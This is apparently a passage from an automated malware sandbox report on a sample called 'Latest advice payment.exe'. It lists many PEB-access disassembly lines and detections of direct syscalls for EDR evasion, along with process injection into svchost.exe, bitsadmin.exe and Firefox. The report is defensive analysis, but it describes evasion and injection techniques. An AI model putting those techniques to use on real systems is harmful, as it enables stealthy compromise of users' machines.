                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A430 mov eax, dword ptr fs:[00000030h]2_2_0346A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034304E5 mov ecx, dword ptr fs:[00000030h]2_2_034304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA49A mov eax, dword ptr fs:[00000030h]2_2_034EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034364AB mov eax, dword ptr fs:[00000030h]2_2_034364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034644B0 mov ecx, dword ptr fs:[00000030h]2_2_034644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BA4B0 mov eax, dword ptr fs:[00000030h]2_2_034BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h]2_2_034E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h]2_2_034E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]2_2_03502B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]2_2_03502B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]2_2_03502B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]2_2_03502B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]2_2_034C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]2_2_034C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FAB40 mov eax, dword ptr fs:[00000030h]2_2_034FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D8B42 mov eax, dword ptr fs:[00000030h]2_2_034D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428B50 mov eax, dword ptr fs:[00000030h]2_2_03428B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DEB50 mov eax, dword ptr fs:[00000030h]2_2_034DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342CB7E mov eax, dword ptr fs:[00000030h]2_2_0342CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504B00 mov eax, dword ptr fs:[00000030h]2_2_03504B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]2_2_0345EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]2_2_0345EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]2_2_034F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]2_2_034F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]2_2_03450BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]2_2_03450BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]2_2_03450BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]2_2_03430BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]2_2_03430BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]2_2_03430BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DEBD0 mov eax, dword ptr fs:[00000030h]2_2_034DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]2_2_03438BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]2_2_03438BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]2_2_03438BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EBFC mov eax, dword ptr fs:[00000030h]2_2_0345EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BCBF0 mov eax, dword ptr fs:[00000030h]2_2_034BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]2_2_03440BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]2_2_03440BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h]2_2_034E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h]2_2_034E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]2_2_03440A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]2_2_03440A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]2_2_0346CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]2_2_0346CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]2_2_0346CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DEA60 mov eax, dword ptr fs:[00000030h]2_2_034DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]2_2_034ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]2_2_034ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BCA11 mov eax, dword ptr fs:[00000030h]2_2_034BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA24 mov eax, dword ptr fs:[00000030h]2_2_0346CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EA2E mov eax, dword ptr fs:[00000030h]2_2_0345EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]2_2_03454A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]2_2_03454A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA38 mov eax, dword ptr fs:[00000030h]2_2_0346CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]2_2_03486ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]2_2_03486ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]2_2_03486ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430AD0 mov eax, dword ptr fs:[00000030h]2_2_03430AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]2_2_03464AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]2_2_03464AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]2_2_0346AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]2_2_0346AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504A80 mov eax, dword ptr fs:[00000030h]2_2_03504A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468A90 mov edx, dword ptr fs:[00000030h]2_2_03468A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]2_2_03438AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]2_2_03438AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486AA4 mov eax, dword ptr fs:[00000030h]2_2_03486AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0946 mov eax, dword ptr fs:[00000030h]2_2_034B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504940 mov eax, dword ptr fs:[00000030h]2_2_03504940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]2_2_03456962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]2_2_03456962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]2_2_03456962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]2_2_0347096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E mov edx, dword ptr fs:[00000030h]2_2_0347096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]2_2_0347096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]2_2_034D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]2_2_034D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC97C mov eax, dword ptr fs:[00000030h]2_2_034BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]2_2_034AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]2_2_034AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC912 mov eax, dword ptr fs:[00000030h]2_2_034BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]2_2_03428918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]2_2_03428918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B892A mov eax, dword ptr fs:[00000030h]2_2_034B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C892B mov eax, dword ptr fs:[00000030h]2_2_034C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C69C0 mov eax, dword ptr fs:[00000030h]2_2_034C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034649D0 mov eax, dword ptr fs:[00000030h]2_2_034649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FA9D3 mov eax, dword ptr fs:[00000030h]2_2_034FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE9E0 mov eax, dword ptr fs:[00000030h]2_2_034BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h]2_2_034629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h]2_2_034629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]2_2_034309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]2_2_034309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B89B3 mov esi, dword ptr fs:[00000030h]2_2_034B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]2_2_034B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]2_2_034B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03442840 mov ecx, dword ptr fs:[00000030h]2_2_03442840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460854 mov eax, dword ptr fs:[00000030h]2_2_03460854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]2_2_03434859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]2_2_03434859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]2_2_034BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]2_2_034BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]2_2_034C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]2_2_034C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC810 mov eax, dword ptr fs:[00000030h]2_2_034BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]2_2_03452835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]2_2_03452835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]2_2_03452835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov ecx, dword ptr fs:[00000030h]2_2_03452835
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005B80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_005B80A9
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_0058A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0058A155
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_0058A124 SetUnhandledExceptionFilter,0_2_0058A124

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeNtOpenKeyEx: Direct from: 0x77383C9CJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeNtClose: Direct from: 0x77382B6C
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeNtQueryValueKey: Direct from: 0x77382BECJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\Latest advice payment.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\bitsadmin.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: NULL target: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: NULL target: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\bitsadmin.exeThread register set: target process: 7324Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\bitsadmin.exeThread APC queued: target process: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\Latest advice payment.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7A6008Jump to behavior
